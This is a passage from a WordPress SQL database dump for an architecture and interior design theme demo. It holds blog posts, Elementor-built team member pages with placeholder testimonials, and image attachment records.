functionality.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">Sustainable Design and Efficiency</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Mathematics also plays a role in sustainable architecture. Architects use mathematical modeling and analysis to optimize energy efficiency, reduce waste, and minimize environmental impact. Calculations involving insulation, solar orientation, and material usage contribute to creating eco-friendly and sustainable designs.</p>\n<!-- /wp:paragraph -->','Do you need math for architecture?','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable','publish','open','open','','do-you-need-math-for-architecture','','','2023-09-25 10:38:44','2023-09-25 10:38:44','',0,'https://demo.ovatheme.com/retirio/?p=2430',0,'post','',0),(2432,1,'2023-09-22 14:00:27','2023-09-22 14:00:27','<!-- wp:paragraph -->\n<p>Interior design is an ever-evolving field that constantly adapts to the changing needs and preferences of society. As we move into the future, several key trends and innovations are shaping the way we think about and approach interior design. In this article, we will explore some of the exciting developments that are likely to define the future of interior design.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Interior design is an ever-evolving field that constantly adapts to the changing needs and preferences of society. As we move into the future, several key trends and innovations are shaping the way we think about and approach interior design. In this article, we will explore some of the exciting developments that are likely to define the future of interior design. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">1. Sustainable Design</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>One of the most significant trends in interior design\'s future is a strong focus on sustainability. With increasing environmental concerns, designers are placing a greater emphasis on eco-friendly materials, energy-efficient designs, and sustainable practices. This means incorporating elements such as recycled materials, energy-efficient lighting, and green building techniques into interior spaces. Sustainability is not just a trend; it\'s becoming a fundamental aspect of interior design.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":230,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-2.jpg\" alt=\"\" class=\"wp-image-230\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":217,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image.jpg\" alt=\"\" class=\"wp-image-217\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">2. Smart Homes</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>The future of interior design is undoubtedly connected to technology. Smart homes are becoming more prevalent, and interior designers are incorporating smart technology seamlessly into their designs. From voice-controlled lighting to integrated security systems, the interior spaces of the future will be both aesthetically pleasing and highly functional.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">3. Biophilic Design</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Incorporating nature into interior spaces is another growing trend. Biophilic design, which emphasizes the connection between humans and nature, is gaining popularity. This can involve using natural materials like wood and stone, as well as incorporating elements like indoor gardens and living walls. Biophilic design not only enhances the aesthetics of a space but also promotes well-being and productivity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">4. Personalization and Customization</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Interior design is becoming increasingly personal. Clients want spaces that reflect their unique tastes and lifestyles. In the future, customization will play a significant role in interior design. Whether it\'s custom furniture, tailored color palettes, or personalized layouts, interior designers will need to cater to individual preferences to create truly one-of-a-kind spaces.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\">6. Minimalism and Maximalism</h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Design trends often swing between minimalism and maximalism, and the future will likely see a fusion of these two approaches. Some spaces may embrace the simplicity and clean lines of minimalism, while others will go all out with bold colors, patterns, and textures. This flexibility allows for a broader range of design possibilities to cater to diverse tastes.</p>\n<!-- /wp:paragraph -->','What is the future of interior design?','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable','publish','open','open','','what-is-the-future-of-interior-design','','','2023-09-25 10:38:03','2023-09-25 10:38:03','',0,'https://demo.ovatheme.com/retirio/?p=2432',0,'post','',0),(2434,1,'2022-06-23 09:11:53','2022-06-23 09:11:53','','blog-01','','inherit','open','closed','','blog-01','','','2022-06-23 09:11:53','2022-06-23 09:11:53','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/blog-01.jpg',0,'attachment','image/jpeg',0),(2435,1,'2022-06-23 09:11:54','2022-06-23 09:11:54','','blog-02','','inherit','open','closed','','blog-02','','','2022-06-23 09:11:54','2022-06-23 09:11:54','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/blog-02.jpg',0,'attachment','image/jpeg',0),(2436,1,'2022-06-23 09:11:55','2022-06-23 09:11:55','','blog-03','','inherit','open','closed','','blog-03','','','2022-06-23 09:11:55','2022-06-23 09:11:55','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/blog-03.jpg',0,'attachment','image/jpeg',0),(2437,1,'2022-06-23 09:11:56','2022-06-23 09:11:56','','blog-04','','inherit','open','closed','','blog-04','','','2022-06-23 09:11:56','2022-06-23 09:11:56','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/blog-04.jpg',0,'attachment','image/jpeg',0),(2465,1,'2022-06-23 09:27:39','2022-06-23 09:27:39','<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Personal experience</h2>		\n		<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.</p>		\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n				Interior\n									40%\n			<section>\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Kevin martin\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Kevin martin</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Jessica brown </p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Mike hardson\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Mike hardson</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n			</section>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-planning-stage.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-planning-stage.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Planning stage</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-flexible-output.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-flexible-output.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Flexible output</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n					<ul>\n							<li>\n										Complete italian wooden works\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-new-material.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-new-material.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>New material</h2>		\n		There are many variations of passages of psum available but the majority have suffered.		\n					<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										  Premium quality of full apartment\n									</li>\n						</ul>','David Cooper','','publish','closed','closed','','david-cooper','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=team&#038;p=2465',0,'team','',0),(2467,1,'2022-06-23 09:28:14','2022-06-23 09:28:14','<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Personal experience</h2>		\n		<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.</p>		\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}</style>			\n				Archirecture\n									85%\n				Designing\n									60%\n				Interior\n									40%\n			<section>\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Kevin martin\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Kevin martin</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Jessica brown </p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Mike hardson\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Mike hardson</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n			</section>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-planning-stage.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-planning-stage.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Planning stage</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-flexible-output.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-flexible-output.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Flexible output</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n					<ul>\n							<li>\n										Complete italian wooden works\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-new-material.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-new-material.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>New material</h2>		\n		There are many variations of passages of psum available but the majority have suffered.		\n					<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										  Premium quality of full apartment\n									</li>\n						</ul>','Christine eve','','publish','closed','closed','','christine-eve','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=team&#038;p=2467',0,'team','',0),(2469,1,'2022-06-23 09:28:54','2022-06-23 09:28:54','<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Personal experience</h2>		\n		<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.</p>		\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n				Interior\n									60%\n			<section>\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Kevin martin\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Kevin martin</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Jessica brown </p>\n																																	<p>Customer</p>\n										<!-- end info -->\n																																	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Mike hardson\" >\n																			<p>This is due to their excellent service, competitive pricing and customer support. It’s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.</p>\n																						<p>Mike hardson</p>\n																																	<p>Customer</p>\n										<!-- end info -->\n			</section>\n			<style>/*! elementor - v3.6.6 - 08-06-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-planning-stage.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-planning-stage.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-planning-stage-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Planning stage</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n			<link rel=\"stylesheet\" href=\"https://demo.ovatheme.com/retirio/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-flexible-output.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-flexible-output.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-flexible-output-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>Flexible output</h2>		\n		<p>There are many variations of passages of psum available but the majority have suffered.</p>		\n					<ul>\n							<li>\n										Complete italian wooden works\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										Modern design ideas\n									</li>\n						</ul>\n															<img width=\"370\" height=\"271\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-new-material.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/about-me-new-material.jpg 370w, https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/about-me-new-material-300x220.jpg 300w\" sizes=\"(max-width: 370px) 100vw, 370px\" />															\n			<h2>New material</h2>		\n		There are many variations of passages of psum available but the majority have suffered.		\n					<ul>\n							<li>\n										Residential interior work\n									</li>\n								<li>\n										 Creative solutions for home\n									</li>\n								<li>\n										  Premium quality of full apartment\n									</li>\n						</ul>','Mike Hardson','','publish','closed','closed','','mike-hardson','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=team&#038;p=2469',0,'team','',0),(2628,1,'2022-06-24 07:30:36','2022-06-24 07:30:36','<ul>\n        <li data-slug=\"all\">\n            All\n            11\n        </li>\n                <li data-slug=\"architect\">\n            Architect \n            3\n        </li>\n                <li data-slug=\"design\">\n            Design \n            4\n        </li>\n                <li data-slug=\"interior\">\n            Interior \n            4\n        </li>\n    </ul>','Example','','publish','closed','closed','','example','','','2022-06-24 07:30:36','2022-06-24 07:30:36','',0,'https://demo.ovatheme.com/retirio/?page_id=2628',0,'page','',0),(2653,1,'2022-06-24 07:48:19','2022-06-24 07:48:19','','bg-contact-with-us','','inherit','open','closed','','bg-contact-with-us','','','2022-06-24 07:48:19','2022-06-24 07:48:19','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-contact-with-us.jpg',0,'attachment','image/jpeg',0),(2821,1,'2022-06-24 09:39:29','2022-06-24 09:39:29','','decor-get-to-khow-us-1','','inherit','open','closed','','decor-get-to-khow-us-1','','','2022-06-24 09:39:29','2022-06-24 09:39:29','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-get-to-khow-us-1.jpg',0,'attachment','image/jpeg',0),(2822,1,'2022-06-24 09:39:29','2022-06-24 09:39:29','','decor-get-to-khow-us-dots.jpg','','inherit','open','closed','','decor-get-to-khow-us-dots-jpg','','','2022-06-24 09:39:29','2022-06-24 09:39:29','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-get-to-khow-us-dots.jpg.png',0,'attachment','image/png',0),(2823,1,'2022-06-24 09:39:29','2022-06-24 09:39:29','','decor-get-to-khow-us-main','','inherit','open','closed','','decor-get-to-khow-us-main','','','2022-06-24 09:39:29','2022-06-24 09:39:29','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-get-to-khow-us-main.jpg',0,'attachment','image/jpeg',0),(2849,1,'2022-06-24 09:53:12','2022-06-24 09:53:12','','blog-5','','inherit','open','closed','','blog-5','','','2022-06-24 09:53:12','2022-06-24 09:53:12','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/blog-5.jpg',0,'attachment','image/jpeg',0),(2954,1,'2022-06-27 03:50:30','2022-06-27 03:50:30','','mask-img-01','','inherit','open','closed','','mask-img-01','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mask-img-01.svg',0,'attachment','image/svg+xml',0),(2955,1,'2022-06-27 03:51:08','2022-06-27 03:51:08','','mask-img-02','','inherit','open','closed','','mask-img-02','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mask-img-02.svg',0,'attachment','image/svg+xml',0),(2991,1,'2022-06-27 04:02:50','2022-06-27 04:02:50','','pexels-lina-kivaka-1841143','','inherit','open','closed','','pexels-lina-kivaka-1841143','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg',0,'attachment','image/jpeg',0),(2996,1,'2022-06-27 04:05:07','2022-06-27 04:05:07','','armin-djuhic-mcL2f-J74GY-unsplash','','inherit','open','closed','','armin-djuhic-mcl2f-j74gy-unsplash','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg',0,'attachment','image/jpeg',0),(3000,1,'2022-06-27 04:07:34','2022-06-27 04:07:34','','bg-shape-architecture','','inherit','open','closed','','bg-shape-architecture','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-shape-architecture.png',0,'attachment','image/png',0),(3001,1,'2022-06-27 04:08:04','2022-06-27 04:08:04','','decor-in-mask-home1-01','','inherit','open','closed','','minh-pham-otxadkuh3-i-unsplash','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg',0,'attachment','image/jpeg',0),(3060,1,'2022-06-27 04:20:25','2022-06-27 04:20:25','','bg-testimonial-and-contact-home2','','inherit','open','closed','','bg-testimonial-and-contact-home2','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-testimonial-and-contact-home2.jpg',0,'attachment','image/jpeg',0),(3123,1,'2022-06-27 07:37:04','2022-06-27 07:37:04','','qaulife','','inherit','open','closed','','qaulife','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/qaulife.jpg',0,'attachment','image/jpeg',0),(3133,1,'2022-06-27 08:41:39','2022-06-27 08:41:39','','morder','','inherit','open','closed','','morder','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/morder.jpg',0,'attachment','image/jpeg',0),(3134,1,'2022-06-27 08:41:52','2022-06-27 08:41:52','','Innovative','','inherit','open','closed','','innovative','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Innovative.jpg',0,'attachment','image/jpeg',0),(3226,1,'2022-06-27 09:13:31','2022-06-27 09:13:31','','part-counter-get-know-us','','inherit','open','closed','','part-counter-get-know-us','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/part-counter-get-know-us.png',0,'attachment','image/png',0),(3250,1,'2022-06-27 09:19:47','2022-06-27 09:19:47','','image-home3','','inherit','open','closed','','image-home3','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-home3.jpg',0,'attachment','image/jpeg',0),(3383,1,'2022-06-27 10:26:17','2022-06-27 10:26:17','','woocommerce-placeholder','','inherit','open','closed','','woocommerce-placeholder-2','','','2022-06-27 10:26:17','2022-06-27 10:26:17','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/woocommerce-placeholder.png',0,'attachment','image/png',0),(3388,1,'2022-06-27 10:26:18','2022-06-27 10:26:18','<!-- wp:paragraph -->\n<p><b>This is a sample page.</b></p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<h3>Overview</h3>\n<!-- /wp:paragraph 